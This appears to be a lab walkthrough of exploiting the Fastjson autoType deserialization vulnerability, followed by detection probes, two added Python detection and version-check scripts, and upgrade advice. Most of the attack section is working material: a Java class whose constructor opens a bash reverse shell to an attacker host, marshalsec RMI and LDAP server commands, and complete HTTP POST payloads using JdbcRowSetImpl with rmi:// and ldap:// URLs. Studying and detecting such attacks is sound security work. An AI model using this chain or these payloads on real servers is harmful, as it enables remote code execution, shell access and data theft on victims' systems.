1. Vulnerability introduction
While parsing JSON, Fastjson supports autoType: the JSON can name a class in the @type field, and Fastjson instantiates that class and calls its set/get methods to populate its properties. By looking for suitable methods in the code, malicious exploit chains can be constructed. In plain terms: Fastjson's autoType handling of JSON objects does not fully validate the @type field, so an attacker can pass in a dangerous class; that class connects to a remote RMI host, from which a malicious class is loaded and its code executed. In this way attackers achieve remote code execution, obtain sensitive server information, and can go further and modify, add or delete server data, with a huge impact on the server.
2. Vulnerability recurrence
(1) First use docker to set up a fastjson deserialization vulnerability environment:
(2) Access the environment page, which looks as follows:
(3) RMI exploitation method: first write the attack class, which bounces a shell back to kali:
public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.0.105/8888 0>&1");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
(4) Then use javac to compile it, command:
javac Exploit.java
(5) A .class file is produced next to the source:
(6) Put the compiled file on kali and start a simple HTTP server there with python3, command:
python3 -m http.server 8080
(7) Then use the marshalsec project to start an RMI service that listens on port 8001 and references the remote class Exploit.class, command:
https://github.com/RandomRobbieBF/marshalsec-jar
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.105:8080/#Exploit" 8001
(8) Then start a listener on port 8888 on kali.
(9) Launch the attack with the following payload; note that it is submitted by POST:
POST / HTTP/1.1
Host: 192.168.0.105:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

{
  "naraku":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://192.168.0.105:8001/Exploit",
    "autoCommit":true
  }
}
(10) Success: the shell is bounced back.
(11) LDAP exploitation method
The procedure is roughly the same as before; the only change is to use the marshalsec project to start an LDAP service that listens on port 8002 and references the remote class Exploit.class, command:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.0.105:8080/#Exploit" 8002
(12) Still listening on port 8888 on the kali side, send the payload from Burp; the payload is as follows, and again note that it is a POST request:
POST / HTTP/1.1
Host: 192.168.0.105:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

{
  "naraku":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://192.168.0.105:8002/Exploit",
    "autoCommit":true
  }
}
(13) Success: the shell is bounced back.
3. Vulnerability detection
(1) When capturing the packet, I just saw that it sent JSON data.
(2) To determine whether the target uses fastjson: send an illegally formatted body, which may produce an error, and read the error message; or deserialize one of the classes below and see whether the DNS-log platform receives the request.
(3) Search GitHub for a fastjson plug-in for Burp; as long as the traffic passes through Burp, it can be detected automatically.
Method 1: Use java.net.Inet[4|6]Address
{"@type":"java.net.Inet4Address","val":"in0i3v.ceye.io"}
{"@type":"java.net.Inet6Address","val":"in0i3v.ceye.io"}
Method 2: Using java.net.InetSocketAddress
{"@type":"java.net.InetSocketAddress"{"address":,"val":"in0i3v.ceye.io"}}
Method 3: Using java.net.URL
{{"@type":"java.net.URL","val":"http://in0i3v.ceye.io"}:"x"}
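The probe bodies above and the JdbcRowSetImpl payloads from section 2 can be triaged automatically from captured traffic. The following is an added example, not code from the original post: it scans raw request bodies for @type class names and JNDI URLs and ranks each body. The class lists and sample bodies are constructed from what this page shows; a real deployment would carry a longer gadget list.

```python
import re
from typing import Dict, List

# Classes this page shows being abused: the JNDI gadget from the RMI/LDAP payloads
# and the DNS-callback probe classes from the detection section.
JNDI_GADGETS = {"com.sun.rowset.JdbcRowSetImpl"}
DNS_PROBES = {
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "java.net.InetSocketAddress",
    "java.net.URL",
}

# Fastjson tolerates "@type" in positions a strict JSON parser rejects (an object used
# as a key, as in detection method 3), so scan the raw text instead of json.loads().
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
JNDI_URL_RE = re.compile(r'\b(?:rmi|ldap)://[^"\s]+', re.IGNORECASE)


def autotype_classes(body: str) -> List[str]:
    """Every class named via @type anywhere in the body, in order of appearance."""
    return TYPE_RE.findall(body)


def classify(body: str) -> Dict[str, object]:
    """Rank a request body: 'exploit' > 'probe' > 'autotype' > 'clean'."""
    classes = autotype_classes(body)
    jndi_urls = JNDI_URL_RE.findall(body)
    if any(c in JNDI_GADGETS for c in classes) or (classes and jndi_urls):
        verdict = "exploit"      # gadget class or @type combined with an rmi/ldap URL
    elif any(c in DNS_PROBES for c in classes):
        verdict = "probe"        # out-of-band DNS check like the ones above
    elif classes:
        verdict = "autotype"     # any @type at all deserves a look
    else:
        verdict = "clean"
    return {"verdict": verdict, "classes": classes, "jndi_urls": jndi_urls}


# Constructed sample bodies: the page's RMI payload, two probes, and a benign request
# whose e-mail field contains "@type" as plain text and must not trigger.
SAMPLES = {
    "rmi": '{"naraku":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
           '"dataSourceName":"rmi://192.168.0.105:8001/Exploit","autoCommit":true}}',
    "inet4": '{"@type":"java.net.Inet4Address","val":"in0i3v.ceye.io"}',
    "url_key": '{{"@type":"java.net.URL","val":"http://in0i3v.ceye.io"}:"x"}',
    "benign": '{"user":"alice","email":"alice@type.example"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, classify(body)["verdict"])
```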
4. The cause of the vulnerability
The deserialized data itself is harmless; the harm comes from the application using attacker-controllable data.
Vulnerability information:
Fastjson 1.2.24 deserialization leading to arbitrary command execution: while parsing JSON, fastjson supports using autoType to instantiate a specific class and calls that class's set/get methods to access properties. By looking for suitable methods in the code, malicious exploit chains can be constructed. Affects fastjson <= 1.2.24.
Fastjson 1.2.47 remote command execution: fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48 an attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands. Affects fastjson < 1.2.48.
5. Bug fixes
1. Upgrade fastjson to at least version 1.2.58.
2. Keep the Java runtime version up to date.
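To check the first fix across a code base, the fastjson version in a Maven pom.xml can be compared against the thresholds this page lists (<= 1.2.24, < 1.2.48, and the recommended minimum 1.2.58). This is an added example, not part of the original post; it assumes the artifactId element is followed directly by a literal version element, and the pom fragment is constructed.

```python
import re
from typing import List, Optional, Tuple

# Thresholds from this page: autoType RCE, whitelist bypass, recommended minimum.
AUTOTYPE_RCE_MAX = (1, 2, 24)
WHITELIST_BYPASS_FIXED = (1, 2, 48)
MIN_RECOMMENDED = (1, 2, 58)

# Matches "<artifactId>fastjson</artifactId>" followed by a literal version element.
# A property reference such as ${fastjson.version} is not matched and yields None.
FASTJSON_DEP_RE = re.compile(
    r"<artifactId>\s*fastjson\s*</artifactId>\s*<version>\s*([\d.]+)\s*</version>",
    re.DOTALL,
)

# Constructed pom.xml fragment (not from the original page).
POM_SAMPLE = """
<dependencies>
  <dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.47</version>
  </dependency>
</dependencies>
"""


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.2.47' -> (1, 2, 47); tuples compare numerically, unlike plain strings."""
    return tuple(int(part) for part in text.split("."))


def fastjson_version(pom: str) -> Optional[Tuple[int, ...]]:
    match = FASTJSON_DEP_RE.search(pom)
    return parse_version(match.group(1)) if match else None


def assess(version: Tuple[int, ...]) -> List[str]:
    """List which of the page's issues apply to a given fastjson version."""
    issues = []
    if version <= AUTOTYPE_RCE_MAX:
        issues.append("autoType RCE (fastjson <= 1.2.24)")
    if version < WHITELIST_BYPASS_FIXED:
        issues.append("whitelist bypass (fastjson < 1.2.48)")
    if version < MIN_RECOMMENDED:
        issues.append("below recommended minimum 1.2.58")
    return issues


if __name__ == "__main__":
    found = fastjson_version(POM_SAMPLE)
    print(found, assess(found) if found else "no literal fastjson version found")
```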